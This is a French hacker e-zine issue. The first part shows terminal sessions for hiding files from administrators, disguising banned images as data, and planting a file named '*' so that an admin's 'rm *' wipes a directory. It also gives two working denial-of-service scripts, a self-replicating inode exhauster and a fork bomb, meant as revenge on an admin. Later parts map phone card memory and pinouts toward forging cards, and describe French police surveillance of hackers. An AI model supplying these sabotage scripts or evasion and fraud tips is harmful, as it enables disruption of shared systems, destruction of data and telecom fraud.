-rwx------ 1 fred emprunte 8331 Sep 3 1993 .Xresources
-rwx------ 1 fred emprunte 653 Jul 4 15:21 .cshrc
drwx------ 2 fred emprunte 512 Jun 12 22:31 .elm
-rw------- 1 fred emprunte 2229 Jul 4 17:45 .history
-rwx------ 1 fred emprunte 207 Sep 3 1993 .login
-rwx------ 1 fred emprunte 105 Sep 3 1993 .mailrc
-rwx------ 1 fred emprunte 83 Sep 3 1993 .profile
-rwx------ 1 fred emprunte 7908 Sep 3 1993 .twmrc
-rwx------ 1 fred emprunte 866 Sep 3 1993 .xinitrc
drwx------ 2 fred emprunte 512 Jun 12 22:31 Mail
-rw------- 1 fred emprunte 260 Sep 15 02:24 milnet.dialup
drwx------ 7 fred emprunte 512 Jun 20 01:40 src
drwx------ 2 fred emprunte 512 Sep 15 02:21 tmp
drwx------ 5 fred emprunte 512 Jul 4 14:45 tools
DaubeNet-fred {111} mv ".. /milnet.dialup" .
DaubeNet-fred {112} ls -al
total 47
drwx------ 13 fred emprunte 512 Sep 15 02:26 .
drwxrwxr-x 5 root wheel 512 Sep 9 12:03 ..
drwx------ 2 fred emprunte 512 Sep 15 02:26 ..
-rwx------ 1 fred emprunte 655 Sep 3 1993 .Xmodmaprc
-rwx------ 1 fred emprunte 8331 Sep 3 1993 .Xresources
-rwx------ 1 fred emprunte 653 Jul 4 15:21 .cshrc
drwx------ 2 fred emprunte 512 Jun 12 22:31 .elm
-rw------- 1 fred emprunte 2229 Jul 4 17:45 .history
-rwx------ 1 fred emprunte 207 Sep 3 1993 .login
-rwx------ 1 fred emprunte 105 Sep 3 1993 .mailrc
-rwx------ 1 fred emprunte 83 Sep 3 1993 .profile
-rwx------ 1 fred emprunte 7908 Sep 3 1993 .twmrc
-rwx------ 1 fred emprunte 866 Sep 3 1993 .xinitrc
drwx------ 2 fred emprunte 512 Jun 12 22:31 Mail
-rw------- 1 fred emprunte 260 Sep 15 02:24 milnet.dialup
-rw------- 1 fred emprunte 1040 Sep 15 02:24 root.axs
drwx------ 7 fred emprunte 512 Jun 20 01:40 src
drwx------ 2 fred emprunte 512 Sep 15 02:21 tmp
drwx------ 5 fred emprunte 512 Jul 4 14:45 tools
[Alors pour pas faire trop louche, on va creer un directory pour un utilitaire
bien obscure et qui semble utile à l'admin. Pour le trouver, reflechissez un
peu et pas la peine de mettre ".Xnewsrc " si votre systeme n'a pas les news ;]
DaubeNet-fred {113} mkdir ".Xnewsrc "
DaubeNet-fred {114} mv root.axs milnet.dialup ".Xnewsrc "
DaubeNet-fred {115} cd ".Xnewsrc "
DaubeNet-fred {116} ls
milnet.dialup root.axs
DaubeNet-fred {117} ll
total 3
1 -rw------- 1 fred emprunte 260 Sep 15 02:24 milnet.dialup
2 -rw------- 1 fred emprunte 1040 Sep 15 02:24 root.axs
DaubeNet-fred {118} ls -al
total 5
drwx------ 2 fred emprunte 512 Sep 15 02:27 .
drwx------ 14 fred emprunte 512 Sep 15 02:27 ..
-rw------- 1 fred emprunte 260 Sep 15 02:24 milnet.dialup
-rw------- 1 fred emprunte 1040 Sep 15 02:24 root.axs
DaubeNet-fred {119} cd ..
DaubeNet-fred {120} ll
total 43
1 drwx------ 2 fred emprunte 512 Sep 15 02:26 ..
1 -rwx------ 1 fred emprunte 655 Sep 3 1993 .Xmodmaprc
1 drwx------ 2 fred emprunte 512 Sep 15 02:27 .Xnewsrc
9 -rwx------ 1 fred emprunte 8331 Sep 3 1993 .Xresources
1 -rwx------ 1 fred emprunte 653 Jul 4 15:21 .cshrc
1 drwx------ 2 fred emprunte 512 Jun 12 22:31 .elm
3 -rw------- 1 fred emprunte 2229 Jul 4 17:45 .history
1 -rwx------ 1 fred emprunte 207 Sep 3 1993 .login
1 -rwx------ 1 fred emprunte 105 Sep 3 1993 .mailrc
1 -rwx------ 1 fred emprunte 83 Sep 3 1993 .profile
8 -rwx------ 1 fred emprunte 7908 Sep 3 1993 .twmrc
1 -rwx------ 1 fred emprunte 866 Sep 3 1993 .xinitrc
1 drwx------ 2 fred emprunte 512 Jun 12 22:31 Mail
1 drwx------ 7 fred emprunte 512 Jun 20 01:40 src
1 drwx------ 2 fred emprunte 512 Sep 15 02:21 tmp
1 drwx------ 5 fred emprunte 512 Jul 4 14:45 tools
[ c'est discret et ca apparait pas sans l'option "-a" de "ls"]
DaubeNet-fred {121} ls -l
total 12
drwx------ 2 fred emprunte 512 Jun 12 22:31 Mail
drwx------ 7 fred emprunte 512 Jun 20 01:40 src
drwx------ 2 fred emprunte 512 Sep 15 02:21 tmp
drwx------ 5 fred emprunte 512 Jul 4 14:45 tools
DaubeNet-fred {122} rm -fr ".Xnewsrc "
DaubeNet-fred {123} ls -al
total 44
drwx------ 13 fred emprunte 512 Sep 15 02:27 .
drwxrwxr-x 5 root wheel 512 Sep 9 12:03 ..
drwx------ 2 fred emprunte 512 Sep 15 02:26 ..
-rwx------ 1 fred emprunte 655 Sep 3 1993 .Xmodmaprc
-rwx------ 1 fred emprunte 8331 Sep 3 1993 .Xresources
-rwx------ 1 fred emprunte 653 Jul 4 15:21 .cshrc
drwx------ 2 fred emprunte 512 Jun 12 22:31 .elm
-rw------- 1 fred emprunte 2229 Jul 4 17:45 .history
-rwx------ 1 fred emprunte 207 Sep 3 1993 .login
-rwx------ 1 fred emprunte 105 Sep 3 1993 .mailrc
-rwx------ 1 fred emprunte 83 Sep 3 1993 .profile
-rwx------ 1 fred emprunte 7908 Sep 3 1993 .twmrc
-rwx------ 1 fred emprunte 866 Sep 3 1993 .xinitrc
drwx------ 2 fred emprunte 512 Jun 12 22:31 Mail
drwx------ 7 fred emprunte 512 Jun 20 01:40 src
drwx------ 2 fred emprunte 512 Sep 15 02:21 tmp
drwx------ 5 fred emprunte 512 Jul 4 14:45 tools
DaubeNet-fred {124} exit
======> Script done on Thu Sep 15 02:28:05 1994
Interressant n'est ce pas?
Comme ca on peut planquer des trucs sympa meme si il y a un petit "d" au tout
debut de l'affichage, on peut quand meme les cacher la dedans car en général
les admins sont trop flemmards pour aller fouiller la dedans.
Le nombre d'espace a la fin du fichier peut varier, un seul espace c'est tout
de suite ce que l'on teste, mais si vous en mettez 42, c'est beaucoup moins
évident.
L'intéret de créer des fichier commencant par "." est qu'ils ne sont pas listés
à moins qu'on donne l'option "-a" a la commande "ls".
Vous pouvez aussi inclure des caracteres de controles dans le nom de vos
fichier comme ^X ou ^T mais je déconseille car ca attire plutot l'attention.
Comment je planque mes images?
=============================
Dans certaines ecoles, il y a des rägles pas si conne que ca qui
interdisent les images sur leur réseau et donc des moulinettes tournent tous
les jours pour traquer les .gif, .jpg etc...
Pour eviter de vous les faire detruire, vous pouvez les cacher dans des
fichiers TAR.
exemple:
======> Script started on Thu Sep 15 02:49:50 1994
DaubeNet-tmp {101} ls -al
total 778
drwx------ 2 fred emprunte 512 Sep 15 02:49 .
drwx------ 13 fred emprunte 512 Sep 15 02:27 ..
-rw------- 1 fred emprunte 557056 Sep 15 02:49 hardfuck.gif
-rw------- 1 fred emprunte 221184 Sep 15 02:48 susan.gif
DaubeNet-tmp {102} tar cvf projet-math.tar hardfuck.gif susan.gif
hardfuck.gif
susan.gif
tar: tar vol 1, 2 files, 0 bytes read, 788480 bytes written.
DaubeNet-tmp {103} ll
total 1560
552 -rw------- 1 fred emprunte 557056 Sep 15 02:49 hardfuck.gif
784 -rw------- 1 fred emprunte 788480 Sep 15 02:50 projet-math.tar
224 -rw------- 1 fred emprunte 221184 Sep 15 02:48 susan.gif
DaubeNet-tmp {106} rm hardfuck.gif
DaubeNet-tmp {107} rm susan.gif
DaubeNet-tmp {108} ll
total 784
784 -rw------- 1 fred emprunte 788480 Sep 15 02:50 projet-math.tar
DaubeNet-tmp {109} compress projet-math.tar
DaubeNet-tmp {110} ll
total 5
5 -rw------- 1 fred emprunte 4169 Sep 15 02:50 projet-math.tar.Z
DaubeNet-tmp {111} exit
======> Script done on Thu Sep 15 02:51:17 1994
Si le programme de l'admin est assez vicieux pour checker l'interieur des
fichiers compresses et de le detarer ensuite, vous n'avez qu'a faire cela et
ensuite UUENCODER votre "projet-math.tar.Z" en un "projet-math.dat" ainsi tout
le monde (y compris le programme) pensera que c'est un fichier donnée.
Crypter ses fichiers:
====================
Sous unix, il y a un petit utilitaire bien piegeur qui s'appelle crypt.
Attention, si votre Admin n'est pas trop con, il aura un petit outil appelé
gentiment CBW pour Crypt Breaker Workbench qui lui permettra de casser le code
de crypt. Je vous déconseille donc d'utiliser crypt.
(PS: cbw peut vous àtre utile, il est disponible en ftp anonymous un peu
partout sur l'internet sous le nom: cbw.tar.Z).
Par contre, un package genial c'est PGP: un produit qui permet
d'ampliquer assez simplement le cryptage RSA (ou plutot IDEA) qui semble t'il
est une combinaison de DES et de RSA.
C'est vraiment un outil génial qui vaudrait un article de N0 Way a lui tout
seul.
Faire criser son admin:
======================
Vous savez certainnement que sous Unix, certains caracteres sont
interpretés par le Shell avant d'executer la commande dans laquelle était le
fameux caractere.
Ce caractere c'est par exemple "*" qui va àtre remplacé par les noms de tous
les fichiers du directory en question.
Amusez vous a créer dans un directory hyper important de votre admin un fichier
nommé "*".
Exemple:
======> Script started on Thu Sep 15 03:11:09 1994
DaubeNet-/home/root {101} ls -al
total 778
drwxrwxrwx 2 root wheel 512 Sep 15 03:11 .
drwxr-xr-x 13 root wheel 512 Sep 15 02:27 ..
-rw-r-xr-x 1 root wheel 557056 Sep 15 02:49 important.txt
-rw-r-xr-x 1 root wheel 221184 Sep 15 02:48 whole-sources.c
DaubeNet-/home/root {102} cat >\*
^D
DaubeNet-/home/root {103} ll
total 776
0 -rw-r-xr-x 1 fred emprunte 0 Sep 15 03:11 *
552 -rw-r-xr-x 1 root wheel 557056 Sep 15 02:49 important.txt
224 -rw-r-xr-x 1 root wheel 221184 Sep 15 02:48 whole-sources.c
DaubeNet-/home/root {104} exit
======> Script done on Thu Sep 15 03:11:40 1994
L'admin (assez con pour laisser son directory en lecture / ecriture) a une
jolie bombe a retardement qu'il va s'empresser d'allumer des qu'il se loggera.
======> Script started on Thu Sep 15 03:18:54 1994
DaubeNet-/home/root {101} ls -al
total 778
-rw-r-xr-x 1 fred emprunte 0 Sep 15 03:11 *
drwxrwxrwx 2 root wheel 512 Sep 15 03:11 .
drwxr-xr-x 13 root wheel 512 Sep 15 02:27 ..
-rw------- 1 root wheel 557056 Sep 15 02:49 important.txt
-rw------- 1 root wheel 221184 Sep 15 02:48 whole-sources.c
DaubeNet-/home/root {102} rm *
DaubeNet-/home/root {103} ll
DaubeNet-/home/root {104} ls -al
total 2
drwxrwxrwx 2 root wheel 512 Sep 15 03:19 .
drwxr-xr-x 13 root wheel 512 Sep 15 02:27 ..
DaubeNet-/home/root {105} echo Arghhhhh
Arghhhhh
DaubeNet-/home/root {106} exit
======> Script done on Thu Sep 15 03:19:21 1994
VOila, c'est fini pour la partie locale...
Maintenant, je vais vous expliquer comment vous servir des répertoires
incomings et autres pour vous transferer des fichier.
Le FTP anonyme:
==============
Sur FTP Anonyme, vous avez souvent un directory "/incoming" qui vous permet de
déposer des fichiers pour l'admin.
Un site bien configuré aura mis comme mode pour ce dir: rwxrwxr-t qui veut
dire: rwx : lecture/ecriture/traversee possible pour l'owner
rwx : meme chose pour le groupe
-wt : acces en ecriture avec traversée du directory possible mais sans
possibilité d'effacer le fichier d'un autre.
Un site mal configuré aura pour mode: rwxrwxrwx qui veut dire:
lecture, ecriture et traversée pour tout le monde.
Donc vous pourrez vous créer par un
ftp> mkdir ".. "
un fichier secret et ensuite déposer les dernieres versions d'Excel ou le
dernier N0 Way pour vos amis qui viendront les recuperer plus tard et les
effacer!
Interressant n'est ce pas? Ainsi, hop, vous pouvez faire transiter anonymement
des trucs sur Internet.
I-node muncher:
==============
Un admin vous a vraiment fait une crasse? Vous àtes vert et vous
voulez un peu le faire chier...
un "rm -fr /" ? C'est vraiment con car ca peut causer de sales problämes à des
personnes qui n'ont rien fait.
Ce qui est mieux c'est de faire un peu chier l'admin en lui bouffant tous ses
Inodes. Un inode c'est le numéro qui désigne un fichier dans le filesystem
unix donc si vous les prenez tous, personne ne pourra plus creer de fichier
màme si il reste plein de place sur le disque.
Alors voila le shell script nw.sh:
$ cat >nw.sh <<EOF
#!/bin/csh
umask 000
mkdir N0way
cp nw.sh N0way
cd N0way
chmod +x nw.sh
./nw.sh &
EOF
$
Executez ce fichier et *kaboummm* le systäme va commencer à sérieusement merder
hehehehehe...
Vous pouvez màme en lancer plusieurs.
Task muncher:
============
Vous pouvez faire la màme chose avec les processus si les quotas ne
tournent pas. En faisant tourner un seul process qui a chaque fois forke 5
fois et vous verrez que plus la machine va vite, plus votre programme investira
rapidement l'ordinateur en question.
$ cat >dontkill.sh <<EOF
#!/bin/csh
./dontkill.sh &
./dontkill.sh &
./dontkill.sh &
./dontkill.sh &
./dontkill.sh &
EOF
$
Voila, c'est le fion. Euh... la fin.
J'espere que ce ++N-Phile vous aura été bien utile et occupera longtemps votre
admin. N'oubliez pas une chose,
IL EXISTE QUAND MEME DES ADMINS COOLS ALORS, laissez ceux la tranquile. :))
The End.
C'est fini.... y a rien en dessous...
STOP !!!! YA PLUS RIEN.
<EOF>
Non mais c'est dingue, Vous etes sourd ou quoi, je vous repete que c'est FINI!
:)
-%!% N0 Way %!%-
Volume I, Numéro 3, Partie 3.8
Voila, Neuralien m'a presse pour écrire ce petit texte veuillez ne pas tenir
compte des fotes d'orthographes et autre stupiditées du meme genre.
[Bahh... fo tout le temps presser tout le monde. On me le fait bien hehe:
"NeurAlien, depeche toi, c'est quand qu'il sort N0 Way 4?
- Euh... bin attend mon pote, on a pas encore sorti le 3!!! :)" ++N]
CARTES TELEPHONIQUES
1/2
Pour NOWAY
PAR D. O'CONNELL
Depuis "l'invention" par le fumeux Roland Moreno en 1975 de la carte à puce
les applications se sont multipliées. La plus connue étant celle des
téléphones à cartes, on va donc étudier le mode de fonctionnement de ces
cartes dans le but évident d'en ameliorer le fonctionnement..
La realisation technique de la carte tient plus du bricolo que de l'invention
géniale, le seul (et grand) mérite de Moreno a été d'àtre un visionaire
génial.
On peut résumer le fonctionnement de la carte à une eprom à acces serie donc à
priori rien de bien compliqué, nostélécartes francaises comportent une simple
mémoire de 256 bits, oui vous avez bien lu 32 octets!
La carte est séparée en deux zones la premiere de 96 bits ets dites "Zone
constructeur" la deuxieme etant la "zone de transaction", jusque là tout le
mond suit ? pas de probléme?
Les deux zones sont en acces libre pour la lecture, vous pouvez donc voir ce
qui y est écrit sans probleme. La zone transaction peut etre ecrite, mais on
ne peut écrire que des 0 (technologie des eproms) ce qui revient à débiter des
unitées, meme Regis c'est rendu compte que c'était pas vraiement interessant.
La zone constructeur est elle protegée par un fusible qui grille apres la
premiere programmation, donc on peut plus écrire meme des 0. OK ca va??
Voila la map memory d'une carte téléphonique:
Bytes Bits Binary Hexa
+-----------+-----+
1 1 --> 8 | | | ---> Code personnalisé.
+-----------+-----+
2 9 --> 16 | 0000 0011 | $03 | ---> Télécarte
+-----------+-----+
3 17 --> 24 | | |
+-----------+-----+
4 25 --> 32 | | |
+-----------+-----+
5 33 --> 40 | | |
+-----------+-----+
6 41 --> 48 | | |
+-----------+-----+
7 49 --> 56 | | |
+-----------+-----+
8 57 --> 64 | | |
+-----------+-----+
9 65 --> 72 | | |
+-----------+-----+
10 73 --> 80 | | |
+-----------+-----+
11 81 --> 88 | 0001 0000 | $10 |
+-----------+-----+
12 89 --> 96 | 0001 0011 | $13 | ---> 120 unités
| 0000 0110 | $06 | ---> 50 unités
| 0000 0101 | $05 | ---> 40 unités (plus utilisé)
+-----------+-----+
13-31 97 --> 248 | | | ---> Zone de transaction ou chaque
| | | bit represente une unité
| | |
| | |
| | |
| | |
| | |
+-----------+-----+
32 249 --> 256 | 1111 1111 | $FF | ---> Carte vide
+-----------+-----+
En voila assez pour la partie logicielle, on va voir comment on peu acceder
aux données.
Afnor (Franco-Francais) ISO (Internatinnal)
En haut à gauche Milieu Gauche
(abandonné de puis peu)
-------------+------------- -------------+-------------
| 8 | 4 | | 1 | 5 |
| | | | | |
+-------\ | /-------+ +-------\ | /-------+
| 7 +----+----+ 3 | | 2 +----+ + 6 |
| | | | | | | |
+--------| |--------+ +--------| |--------+
| 6 | | 2 | | 3 | | 7 |
| + +----+ | | +----+----+ |
+-------/ | \-------+ +-------/ | \-------+
| 5 | 1 | | 4 | 8 |
| | | | | |
-------------+------------- -------------+-------------
PINOUT: 1 : Vcc = 5V 5 : Gnd (0V)
2 : R/W(Lire='1':Ecrire='0')6 : Vpp = 21V (Tension de prog)
3 : Clock (Horloge) 7 : I/O (Entrée/Sortie)
4 : Reset 8 : Fusible
- Time diagrams:
+21V _____________
+5V____________________________________| |_________________ Vpp
: :
+5V ___________________:_____________:_________________ Reset
0V ________________| : :
: : :
+5V ____ : ____ : ______:______
0V ___| |_______:_____| |________:______| : |__________ Clock
: : : : : : : : :
+5V : : : : : :______:______: : _
0V ___:____:_______:_____:____:________| : |______:__________ R/W
: : : : : : : : :
+5V : : :_____: :________: : : :__________
0V XXXXXXXXXXXXXXXXX_____XXXXXX________XXXXXXXXXXXXXXXXXXXXXX__________ Out
: : : : : :<-----><---->: :
: : : : : :10 to 10 to :
: : : : : :50 ms 50ms :
Reset Bit 1 Bit2 Ecriture Bit 3
Vous avez donc tous les éléments en main pour comprendre le fonctionnement de
la carte, dans un prochain numéro, il y aura un lecteur/ecriveur de carte et
peut etre un "Simulateur de carte téléphonique reprogrammable à volonté".
Pour répondre à vos questions voici l'extrait d'un petit dialogue qui a eu
lieu il y a deja quelque temps chez FB apres un détour au bar Le Terminus:
Si on peut ecrire sur la carte c'est super on peut rajouter des unités!
ARGHH! On peut écrire que des zeros donc déduire des unités!
Comment on fait pour ecrire des '1'?
Il faut effacer l'eprom aux UV
Ben on fait ca ! non?
Ben la resine qu'il y a sur puce est anti UV
On enläve la résine!
En admettant que tu puisses enlever la resine sans endommager le chip, tu
efface TOUT y compris la zone constructeur, que tu ne peux reécrire puisque
le fusible a été grillé!!!!
On remet le fusible!
Bien sur avec tes petits doigts habiles tu recable une connextion de 5 Êm
ca y ait MD tu as trouvé le system :-(
Le moyen n'est pas là, il faut faire croire à la cabine qu'elle est en
presence d'une vraie carte... Que pensez vous d'une RAM avec quelques compos
logique autours??? Voila a vous de vous débrouiller j'ai donné l'idée générale
il ne vous manque plus que la réalisation! Rendez vous dans le prochain
numéro......
[Addendum de chieur de service, je me suis nommé NeurAlien, vous avez remarque
que l'on est repassé du systäme de tambour (vous savez: inserez la carte et
rabatez le couvercle) à un systäme normal sans tambour. Bien sur, le tambour
servait à éviter que les trains de cables puissent etre faits. Alors ya des
Ueber-Phreakers qui ont fait des fausses cartes avec des composants en CMS.
Et donc comme tout tenait sur une carte, FT=baisé car plus de train de cables.
Donc eux aussi ont rusé: Ils ont un systäme genre reflectomätre qui si au lieu
d'etre en contact direct avec la carte, il y a quelques centimetre de cable qui
les menes jusqu'aux contacts normaux d'une vraie carte: ca foire, la carte est
rejetée! Alors je sais pas comment ils ont fait ca mais en tout cas c'est
assez chaud. hehe, je suis pas électronicien mais on m'a dit que ca se faisait
facilement. ++NeurAlien]
Merci à Marc d'avoir passe quelques heures dans certains fichiers de config, à
EFZ TEAM de faire vivre ce zine, et à XXXXX pour mon defunt acces INET.
[je protäge les innocents, pas de pseudos connus et identifiables ds N0 WAY]
D. O'CONNELL A.K.A. HOPPY
-%!% N0 Way %!%-
Volume I, Numéro 3, Partie 3.9
Cet article est un article de CORE-DUMP, journal Underground Hacker jamais
diffuse publiquement.
PS: ca date, maintenant l'underground informatique est bien développé mais non
encore interconnecté.
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
= CORE-DUMP | Volume I | Issue 2 | Phile 6 | [NeurAlien] 12/09/92 =
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
._ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ .
/_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ /|
:_:_:_:_:_:_:_:_:_:_:_:_:_:_:_:_: |
:_: Pourquoi :_: |
:_: L'Underground Informatique:_: |
:_: est-il :_: |
:_: sous développé? :_: |
:_: en France :_: |
:_:_ _ _ _ _ _ _ _ _ _ _ _ _ _:_: |
:_:_:_:_:_:_:_:_:_:_:_:_:_:_:_:_:/'
Par NeurAlien
J'ai choisi de faire cet article sur la vie de l'Underground
Informatique Francais apräs avoir réfléchi au fait qu'il se créait parfois
dans des endroits träs reculés et träs peu ouverts du réseau, des petites
"iles" oó un petit groupe de hackers ou de phone phreaks se rencontrent, mais
que jamais il n'y a eu d'underground organisé et qui dure dans le temps
comparable à ceux formés aux USA ou en Allemagne.
>Qu'est-ce que l'Underground:
============================
Le concept d'underground informatique est venu en premier avec le
Chaos Computers Club de Hambourg qui a fait beaucoup de réflexions poussées
sur les hackers et les phone phreaks.
En fait, l'Underground n'est ni un serveur, ni un journal, ni un groupe
comme les LODs ou le CCCH. L'Underground est un ensemble de relations et
d'histoires qui se répätent et se perpétuent à travers des discussions et
des journaux pour H/P et ainsi, cela forme un petit "monde" totalement
virtuel avec ses propres rägles jamais écrites mais respectées comme
"Ne jamais effacer de donnée sur un systäme d'information a part pour
couvrir sa trace". (cf: article 4 du Phrack 22 par The Mentor)
Aux USA, un vaste Underground H/P existe;formé de Phracks Inc, de Computer
Underground Digest, de différents groupes qui ont toujours étés liés d'une
maniäre quelconque. Il y a toujours eu un contact entre les anciens "mate"
(les meilleurs) qui se sont fait prendre ou qui se sont retirés et les
jeunes hackers et phone phreaks qui arrivaient dans l'Underground.
Il y a toujours eu un souci de continuité de la part de l'Underground aux
USA: les anciens forment des nouveaux avant de s'en aller.
Mais pour la France? On pourrait presque dire qu'il n'y a jamais
eu d'ancien.
>Le probläme de l'underground Francais:
======================================
L'Underground Francais n'a en fait jamais existé en tant que monde
durable. De multiples petits "ilots" comme NICK au sein de MCOM, les
hackers de RIBOUREL, Les SLANS sur VMF/MOP, TeKila's Underground dans
le club TELECOMS sur RTEL ou encore "le royaume télématique" sur la section
'PROBLEMES DE LIAISON SPECIALISE' du serveur de la DTRN ainsi que PIRATEL
sur un serveur gratuit videotext.
Tous ces micro-underground n'ont duré que quelques mois tout au plus.
Bien sñr, vous me direz qu'il existe bien des serveur comme AATEL et PIRATE
sur le réseau x25. Mais leur plus grand probläme est le maillage organisé
et méthodique que la DST a tissé sur les réseaux Francais.
Qu'est ce que la DST. C'est la Direction de la Surveillance du
Territoire dont une grande partie träs bien équipée et träs bien organisée
s'occupe du piratage informatique.
GrÉce à leur "réseau" d'informateur et de surveillance, ils sont capables de
détecter certaines activités tendancieuses sur le réseau Télétel, X25,
ou màme RTC. (l'Internet est träs mal maitrisé!! héhéhé !)
Je vais vous raconter une anecdote qui illustre bien l'étendue de leur
pouvoir. Suite au piratage d'une grande boite d'informatique de France, un
groupe de hacker a été "tracké" par la DST. Dans ce groupe, il y avait un
certain "DIEU" (le pseudonyme), tristement céläbre par son irrespect envers
tous les autres hackers. Ce dernier était recherché activement et pourtant,
personne de la DST n'arrivait à le prendre.
Un jour, un connecté sur un petit micro-serveur RTC pris pour deconner le
pseudo DIEU. Quelques jours plus tard, deux inspecteur débarquaient à la
maison du SYSOP de ce micro-serveur pour savoir qui était ce fameux DIEU.
Manque de pot pour la DST, ce DIEU en question n'était absolument pas le
bon!
(information supplémentaire: le vrai DIEU, le hacker, a quand màme été
retrouvé au bout de 3 ou 4 mois d'enquàtes intensives.)
La DST a des relations partout et est réputée pour tous savoir.
Connaissez vous 1984 de George Orwell???? Vous connaissez alors BIG BROTHER.
La DST, c'est un peu áa mais en moins fort... Néanmoins, vous pouvez àtre
sur que s'ils veulent savoir quelque chose, il seront au courant, à quelque
prix que cela leur coute... Ce sont avec les RG (renseignements généraux) les
oreilles de l'état; à part que pour la DST, il y a eu des BRAS de rajoutés...
Quand au "cerveaux", ils ne semblent pas àtre à la traine dans cet outils
du pouvoir.
On comprends donc mieux pourquoi les hackers sont vite arràtés s'il
y a pleinte de portée.
Däs le début, lors d'une affaire de piratage informatique, c'est la DST qui
s'en occupe plus que la PJ! La DST fait alors un travail méthodique et
complet d'audit pour traquer le hacker. Le hacker ensuite recoit une visite
qui termine en général l'enquàte sur le hacker. Là, les inspecteurs de la
DST font "cracher" tout ce dont ils ont besoin au hacker.
Un micro lors de l'interrogatoire est sans aucun doute possible installé.
Bien sur, les V (petit surnom pour la DST) ne se limitent pas à des questions
uniquement sur l'enquàte en cours... Ils essayent d'avoir toutes les infos
possibles sur les autres hackers pour que cela leur facilite la tache s'ils
doivent trouver d'autre hackers.
Le matériel du hacker est ensuite saisi, et hop, ils disparaissent de votre
vie, sans aucune autre trace qu'un grand manque au niveau matériel et une
lourde menace si jamais on s'avisait de recommencer.
Le conseil nous est aussi donné de ne pas remettre les pieds sur un serveur
avant deux mois au moins.
Apres la partie de la DST, si l'affaire à quelque chose à voir avec une
fraude ou un quelconque gain d'argent, alors vous pouvez àtre sñr d'avoir
une visite de la part de la PJ qui ont des méthodes beaucoup moins calmes
que la DST.
S'il n'y a pas eu plainte par contre mais que selon eux vous devenez trop
dangereux, alors ils font une descente chez vous, il vous font une grande
frayeur et s'arrangent pour que vous rencardiez et informiez sur les
hackers encore actifs pendant plusieurs mois, voir des ANNEES !!!
L'Underground est ainsi decimé, et il est bien sñr impossible
de prévoir si vous àtes ou pas sur la "liste d'attente pour la casserole" de
la DST. Ainsi, il n'y a pas de moyen de véritablement "transmettre" son
savoir en toute sécurité.
>Les moyens et les méthodes de la DST:
=====================================
La DST a vraiment beaucoup de moyens pour tracker un pirate.
Par exemple, ils ont une équipe de spécialiste en informatique et
qui peuvent aider à tout moment les inspecteurs dans leur enquete.
Ils savent précisement comment agissent les hackers et connaissent
en général leurs habitudes ( chevaux de troie - crackers de mot de
passe - worms - backdoors - passes & méthodes )
Si par exemple, ils ne sont pas sur qu'une personne à telle adresse
soit un hacker, ils peuvent envoyer des personnes déguisées en
femme de ménage (je ne suis pas parano) sans aucun probläme. Il ont
des relations qui leur permettent d'avoir * n'importe * quelle
information provenant d'une école par le censeur ou màme les profs.
Les écoutes sont bien sñr monaie courante et ils n'ont pas besoin
faire des écoutes sauvages... Une carte de la DST ouvre tous les
Centres Principaux d'Exploitation sans probläme.
Ils utilisent d'autre part une technologie de pointe au niveau de
l'espionnage informatique. Il s'agit du TEMPEST.
Le principe en est ma foi träs simple. Vous savez certainnement que
tout courant qui passe dans un fil éléctrique non-blindé produit un
champ magnétique et qu'un circuit electronique en fonctionnement
possäde des composants électroniques qui oscillent quand ils sont
dans certains états et ainsi emettent soit sur une frequence
radioéléctrique soit avec un signal électromagnique. Ces signaux
peuvent àtre détecté de träs loin grÉce à des instruments
de haute précision. On peut träs bien décoder les caractäres frappé
sur un clavier qui transitent par le cable ou bien ce qui s'affiche
sur un écran.
Le TEMPEST est l'ensemble ORDINATEUR - DECODEUR - AMPLIFICATEUR -
ANTENNE qui permet de recevoir en clair les informations provenant
de l'ordinateur distant sans aucune liaison que ce soit (à part
l'air).
Ils ont l'habitude de faire du TEMPEST sur les claviers, les disques
durs, les minitels et les cables modem (jamais sur le CPU).
Quand à leurs méthodes, eh bien elles sont simples et efficaces
en général.
Tout d'abord, il y a une surveillance constante des serveurs à
risques comme ceux des anciens pirates, des serveurs comme RTEL oó,
d'une maniäre ou d'une autre, il s'arrangent pour "tenir" le SYSOP
et lui imposer un scan sur des mots-cles comme "hacker", "blue box"
"pirat","NUA","TRANSPAC","NUI","CC","CARTE PASTEL"du style grep(1).
Bien sur, si un club leur parait suspect, ils peuvent aussitot
passer un coup de fil au SYSOP et lui demander le Pass.
Vous pensez bien aussi que toutes les adresses laissées en BAL sont
relevées.
(liste des serveurs écoutés & filtrés: QSD/The Line, RTEL, CHEZ,
TEASER et bien sñr RTEL.)
(liste des serveurs träs certainnements soumis à ces pratiques:
ELIOTT, POUR, PIRATE, AATEL)
Ils s'arrangent aussi pour récuperer le log des appelants avec les
adresses des PAVIs correspondants aux pseudos.
Ainsi, ils ont une table approximative qui donne pour chaque pseudo le
département d'origine.
Une histoire significative de leur méthode est arrivée en
1988-1989 avec Jean Claude Michot alors SYSOP de QBBS.
Si vous vous rappelez bien, QBBS demandait l'adresse et le numéro de
téléphone de chaque user voulant avoir un compte. Il était précisé que
cela resterait confidentiel.
Mais JCM était un pirate (pas un des meilleurs), et de plus, il n'avait
pas grande morale. JCM donc s'était fait prendre par la DST, et ils ont
marchandé un abandon des charges vis à vis de son affaire (le
troc de sa liberté) contre le fichier d'adresse avec la correspondance
avec le pseudo.
JCM qui n'est pas träs respectable ni honàte à préféré divulguer ce
fichier plutìt que d'assumer son erreur! (non pas d'avoir piraté, sa
seule erreur est celle de s'àtre fait prendre à mon sens!)
Mais je suis sñr que la DST a été träs persuasive ce qui peut quelque
peu nous permettre de le pardonner.
La DST quand elle est démunie de moyens de tracking contre une
personne ou un groupe s'arrange pour d'abord voir qui fait quoi (quels
pseudos sont les auteurs de tel ou tel hack) puis ensuite essaye de
voir avec quelles personnes correspondent le hacker.
Ils s'arrangent pour trouver les personnes susceptibles sur le serveur
d'avoir le numéro de téléphone du hacker ou ses coordonnées et ensuite
font une descente chez ces dites personnes.
En leur faisant vraiment träs träs peur et avec leur terrible persuasion,
ils arrivent presque toujours a faire comprendre a cette personne qu'elle
n'aura pas d'ennui si elle dit le numéro de tel ou tel pseudo (qui est le
hacker).
Encore une bonne raison de ne pas montrer son amitié envers certainne
